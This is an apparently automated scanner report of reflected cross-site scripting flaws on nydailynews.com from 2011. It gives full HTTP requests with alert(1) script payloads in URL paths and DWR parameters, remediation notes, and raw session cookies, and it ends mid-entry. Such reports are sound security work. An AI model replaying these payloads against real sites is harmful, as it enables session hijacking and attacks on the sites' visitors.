This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/weather/index.html47dcb'%3balert(1)//ac42f972293 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:51 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46f3'%3balert(1)//e3378de6d1 was submitted in the REST URL parameter 1. This input was echoed as c46f3';alert(1)//e3378de6d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydnc46f3'%3balert(1)//e3378de6d1/content/protected/userAccount.jsp HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:38 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70101
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91bf9'%3balert(1)//a54051b6ae1 was submitted in the REST URL parameter 1. This input was echoed as 91bf9';alert(1)//a54051b6ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn91bf9'%3balert(1)//a54051b6ae1/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:39 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70148
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4694e'%3balert(1)//8c2d8cbf93b639449 was submitted in the REST URL parameter 1. This input was echoed as 4694e';alert(1)//8c2d8cbf93b639449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn4694e'%3balert(1)//8c2d8cbf93b639449/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:25:08 GMT Server: Apache Keep-Alive: timeout=3, max=979 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70270
The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebbf0'-alert(1)-'bf834dc50748ef7b2 was submitted in the batchId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0ebbf0'-alert(1)-'bf834dc50748ef7b2 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h ...[SNIP]... ;";s9.url="http://www.nydailynews.com/entertainment/tv/2011/02/07/2011-02-07_kim_kardashian_w_magazine_photos_spoofed_on_saturday_night_live_by_host_dana_car.html"; dwr.engine._remoteHandleCallback('0ebbf0'-alert(1)-'bf834dc50748ef7b2','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5711f'-alert(1)-'5cdf81443951987e2 was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=05711f'-alert(1)-'5cdf81443951987e2&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h ...[SNIP]... 9.url="http://www.nydailynews.com/entertainment/tv/2011/02/07/2011-02-07_kim_kardashian_w_magazine_photos_spoofed_on_saturday_night_live_by_host_dana_car.html"; dwr.engine._remoteHandleCallback('0','05711f'-alert(1)-'5cdf81443951987e2',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload c60b8<script>alert(1)</script>7359c8d2c7d49e1fd was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesListsc60b8<script>alert(1)</script>7359c8d2c7d49e1fd&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload f8dd1<script>alert(1)</script>58a2a5a85dbc0e420 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStoriesf8dd1<script>alert(1)</script>58a2a5a85dbc0e420&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesf8dd1<script>alert(1)</script>58a2a5a85dbc0e420' }, '0'); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesf8dd1<script> ...[SNIP]...
The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload c3f74<script>alert(1)</script>fae2bb699717cccb5 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1c3f74<script>alert(1)</script>fae2bb699717cccb5&page=/index.html&httpSessionId=&scriptSessionId=F098707DE1EBF5552ABB1B7C7F6A1BFB955&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Origin: http://www.nydailynews.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1c3f74<script>alert(1)</script>fae2bb699717cccb5' }); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 1c3f74< ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de454'%3balert(1)//ad63a129e48 was submitted in the REST URL parameter 1. This input was echoed as de454';alert(1)//ad63a129e48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydnde454'%3balert(1)//ad63a129e48/dwr/engine.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:32:29 GMT Server: Apache Keep-Alive: timeout=3, max=990 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70209
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81635'%3balert(1)//3f6525a37d1 was submitted in the REST URL parameter 1. This input was echoed as 81635';alert(1)//3f6525a37d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydn81635'%3balert(1)//3f6525a37d1/dwr/interface/mostEmailedStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:32:37 GMT Server: Apache Keep-Alive: timeout=3, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70231
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee3e3<script>alert(1)</script>1bc1be80b29 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydn/dwr/interface/mostEmailedStories.jsee3e3<script>alert(1)</script>1bc1be80b29 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e272c'%3balert(1)//496b14c059d was submitted in the REST URL parameter 1. This input was echoed as e272c';alert(1)//496b14c059d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nydne272c'%3balert(1)//496b14c059d/dwr/interface/mostPopularStories.js HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:31:05 GMT Server: Apache Keep-Alive: timeout=3, max=973 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70231
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 601fb<script>alert(1)</script>a6fb0fe92da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
